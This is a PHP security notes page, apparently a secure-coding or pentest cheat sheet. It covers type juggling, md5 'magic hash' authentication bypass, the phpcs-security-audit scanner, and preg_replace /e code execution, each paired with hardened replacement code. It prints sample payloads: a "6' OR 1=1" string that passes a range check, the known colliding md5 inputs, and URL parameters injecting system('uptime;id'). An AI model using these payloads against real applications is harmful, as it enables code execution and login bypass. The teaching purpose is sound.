PHP
Insecure SessionID:
http://samy.pl/phpwn/
https://pwnage.io/not-so-random-numbers-article-by/
Magic Hashes:
https://github.com/spaze/hashes
Type Confusion
Always check the data type before comparing values: PHP's loose comparison (==) silently converts strings to numbers, so a string that merely starts with digits compares equal to an integer.
<?php
assert(0 == '0ABC');  // TRUE: the string is converted to 0 before comparing (PHP 7 and earlier)
assert(0 == 'ABC');   // TRUE even without a leading integer (PHP 7 and earlier)
assert(0 === '0ABC'); // FALSE: strict comparison also checks the type, so this assertion fails (warning or AssertionError, depending on configuration)

function checkIntegerRangeTheWrongWay($int, $min, $max)
{
    // No type check: a string such as "6' OR 1=1" is converted to 6 for the comparison
    return ($int >= $min && $int <= $max);
}

assert(checkIntegerRangeTheWrongWay("6' OR 1=1", 5, 10)); // TRUE incorrectly: the payload passes the range check
?>
Hash Comparison
https://posts.slayerlabs.com/rconfig-vulns/
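The safe counterparts to the loose comparisons in the Type Confusion section, together with the hash-comparison pitfall this section links to, as an added example that is not part of the original page. The function checkIntegerRangeTheRightWay and the sample values are my own; the two md5 "magic hash" inputs are the well-known published ones, and their digests are stated in the comments.

```php
<?php
// Added example (not from the original page): strict input validation and
// constant-time hash comparison, the safe counterparts of the loose
// comparisons shown in the Type Confusion section. Function name is my own.

declare(strict_types=1);

/**
 * Range check that refuses anything that is not a genuine integer.
 * FILTER_VALIDATE_INT rejects "6' OR 1=1", "0ABC", "1e3", floats and empty
 * strings; it accepts an int or a plain decimal string, and applies the
 * range itself via the min_range/max_range options.
 */
function checkIntegerRangeTheRightWay($value, int $min, int $max): bool
{
    $int = filter_var($value, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    // filter_var() returns false on failure; 0 is a valid result, hence ===
    return $int !== false;
}

var_dump(checkIntegerRangeTheRightWay("6' OR 1=1", 5, 10)); // bool(false)
var_dump(checkIntegerRangeTheRightWay('7', 5, 10));         // bool(true)
var_dump(checkIntegerRangeTheRightWay(7, 5, 10));           // bool(true)
var_dump(checkIntegerRangeTheRightWay('0ABC', 0, 10));      // bool(false)

/**
 * "Magic hash" comparison. Both digests have the form 0e<digits>, which is a
 * numeric string in scientific notation; loose comparison of two numeric
 * strings is done as numbers, so 0e462... == 0e830... is 0.0 == 0.0.
 * This holds in PHP 8 as well, because both operands are numeric strings.
 */
$storedHash = md5('240610708'); // "0e462097431906509019562988736854"
$attempt    = md5('QNKCDZO');   // "0e830400451993494058024219903391"

var_dump($storedHash == $attempt);            // bool(true)  -- authentication bypass
var_dump($storedHash === $attempt);           // bool(false) -- strict, but not constant-time
var_dump(hash_equals($storedHash, $attempt)); // bool(false) -- strict and timing-safe

// For stored passwords, do not compare digests at all: let PHP do it.
$stored = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
var_dump(password_verify('QNKCDZO', $stored)); // bool(false)
```

hash_equals() is the right tool for comparing HMACs, CSRF or reset tokens and similar secrets; for passwords use password_hash()/password_verify(), which handle salting and constant-time comparison internally.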
PHPCS Auditor
Example:
>>> composer require pheromone/phpcs-security-audit
Using version ^2.0 for pheromone/phpcs-security-audit
./composer.json has been created
Loading composer repositories with package information
Updating dependencies (including require-dev)
Package operations: 2 installs, 0 updates, 0 removals
- Installing squizlabs/php_codesniffer (3.5.3): Downloading (100%)
- Installing pheromone/phpcs-security-audit (2.0.1): Downloading (100%)
Writing lock file
Generating autoload files
bridings@lupin:/tmp
>>> sh vendor/pheromone/phpcs-security-audit/symlink.sh
Symlink created.
bridings@lupin:/tmp
>>> ./vendor/bin/phpcs --extensions=php,inc,lib,module,info --standard=./vendor/pheromone/phpcs-security-audit/example_base_ruleset.xml ./vendor/pheromone/phpcs-security-audit/
preg_replace
Also affects ereg_replace(), eregi_replace(), mb_ereg_replace() and mb_eregi_replace()!
Example Bad Code:
<?php
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace($_GET['replace'], $_GET['with'], $in);
?>
Exploit Parameter:
http://example.com?replace=/known/e&with=system('uptime;id')
Example Bad Code 2:
<?php
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace('/' . $_GET['replace'] . '/i', $_GET['with'], $in);
?>
Exploit Parameter:
http://example.com?replace=known/e%00&with=system('uptime;id')
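A hardened replacement for the two bad-code snippets above, as an added example that is not part of the original page. It keeps the page's $in string and parameter names; the helper safeReplace() and the sample inputs are my own. The /e modifier was removed in PHP 7.0 (a pattern using it now fails with an "Unknown modifier 'e'" warning), but user-controlled patterns remain a problem: they allow ReDoS, delimiter and modifier injection, and, with the second snippet, null-byte truncation of the pattern, so the user value is always escaped and never used as a pattern.

```php
<?php
// Added example (not from the original page): user input treated as a
// literal search term instead of a pattern. Helper name is my own.

declare(strict_types=1);

function safeReplace(string $search, string $with, string $in): string
{
    // Null bytes have no place in a search term; rejecting them closes the
    // %00 delimiter-truncation trick from the second exploit URL.
    if (strpos($search, "\0") !== false || strpos($with, "\0") !== false) {
        throw new InvalidArgumentException('null byte in input');
    }

    // preg_quote() escapes every PCRE metacharacter and, when passed as the
    // second argument, the delimiter as well, so "known/e" becomes the
    // literal text "known\/e" rather than a pattern plus a modifier.
    $pattern = '/' . preg_quote($search, '/') . '/i';

    // A replacement string passed to preg_replace() still interprets
    // backreferences such as $0, \1 or ${1}; a callback returning the value
    // inserts it completely literally and, unlike /e, never evaluates it.
    return preg_replace_callback($pattern, fn(array $m): string => $with, $in);
}

$in = 'Somewhere, something incredible is waiting to be known';

echo safeReplace('known', 'found', $in), PHP_EOL;
// Somewhere, something incredible is waiting to be found

echo safeReplace('known/e', "system('uptime;id')", $in), PHP_EOL;
// "known/e" is searched for literally, so nothing matches and nothing runs:
// Somewhere, something incredible is waiting to be known

try {
    safeReplace("known/e\0", "system('uptime;id')", $in);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL; // rejected: null byte in input
}

// When the search term is only ever a literal, skip PCRE altogether:
echo str_ireplace('known', 'found', $in), PHP_EOL;
```

If the application genuinely needs user-supplied regular expressions, validate them against an allowlist of constructs and run them with a tight pcre.backtrack_limit, but the default should be the literal-match path shown here.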